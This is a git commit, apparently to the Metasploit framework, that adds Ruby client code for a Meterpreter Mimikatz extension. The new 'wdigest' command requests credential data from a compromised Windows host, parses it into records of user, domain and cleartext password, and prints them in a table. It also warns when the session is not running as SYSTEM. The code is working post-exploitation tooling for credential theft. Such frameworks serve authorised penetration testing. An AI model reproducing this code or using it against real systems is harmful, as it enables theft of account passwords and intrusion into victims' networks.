Add client UI and parse results

Meatballs1 · Meatballs1 · commit a23d7bb66f03 · 2013-04-20T12:20:38.000+01:00
diff --git a/lib/rex/post/meterpreter/extensions/mimikatz/mimikatz.rb b/lib/rex/post/meterpreter/extensions/mimikatz/mimikatz.rb
@@ -16,8 +16,10 @@ module Mimikatz
 # exploitation.
 #
 ###
-class Mimikatz < Extension
 
+require 'csv'
+
+class Mimikatz < Extension
 
 	def initialize(client)
 		super(client, 'mimikatz')
@@ -32,8 +34,23 @@ def initialize(client)
 	end
 
 	def wdigest()
-		request = Packet.create_request('boiler')#'mimikatz_wdigest')
+		request = Packet.create_request('mimikatz_wdigest')
 		response = client.send_request(request)
+		result = Rex::Text.to_ascii(response.get_tlv_value(TLV_TYPE_MIMIKATZ_RESULT))
+	
+		details = CSV.parse(result)
+		accounts  =  []
+		details.each do |acc|
+			account = { 
+				:authid => acc[0],
+				:package => acc[1],
+				:user => acc[2],
+				:domain => acc[3],
+				:password => acc[4]
+			}
+			accounts << account	
+		end
+		return accounts
 	end	
 
 end
diff --git a/lib/rex/post/meterpreter/extensions/mimikatz/tlv.rb b/lib/rex/post/meterpreter/extensions/mimikatz/tlv.rb
@@ -5,6 +5,8 @@ module Meterpreter
 module Extensions
 module Mimikatz
 
+TLV_TYPE_MIMIKATZ_RESULT	= TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 1)
+
 end
 end
 end
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/mimikatz.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/mimikatz.rb
@@ -0,0 +1,78 @@
+# -*- coding: binary -*-
+require 'rex/post/meterpreter'
+
+module Rex
+module Post
+module Meterpreter
+module Ui
+
+###
+#
+# Privilege escalation extension user interface.
+#
+###
+class Console::CommandDispatcher::Mimikatz
+
+	Klass = Console::CommandDispatcher::Mimikatz
+
+	include Console::CommandDispatcher
+
+	#
+	# Initializes an instance of the priv command interaction.
+	#
+	def initialize(shell)
+		super
+	end
+
+	#
+	# List of supported commands.
+	#
+	def commands
+		{
+			"wdigest" => "Attempt to retrieve cleartext wdigest passwords",
+		}
+	end
+
+	def cmd_wdigest(*args)
+		system_privilege_check
+		accounts = client.mimikatz.wdigest
+		
+		table = Rex::Ui::Text::Table.new(
+			'Indent' => 0,
+			'SortIndex' => 4,
+			'Columns' =>
+			[
+				'AuthID', 'Package', 'Domain', 'User', 'Password'
+			]
+		)
+			
+		accounts.each do |acc|
+			table << [acc[:authid], acc[:package], acc[:domain], acc[:user],  acc[:password]]	
+		end
+
+		table.print	
+
+		return true
+	end
+
+	def system_privilege_check
+		if (client.sys.config.getuid != "NT AUTHORITY\\SYSTEM")
+			print_warning("Not currently running as SYSTEM")
+		end
+
+		return true
+	end
+
+	#
+	# Name for this dispatcher
+	#
+	def name
+		"Mimikatz"
+	end
+
+end
+
+end
+end
+end
+end
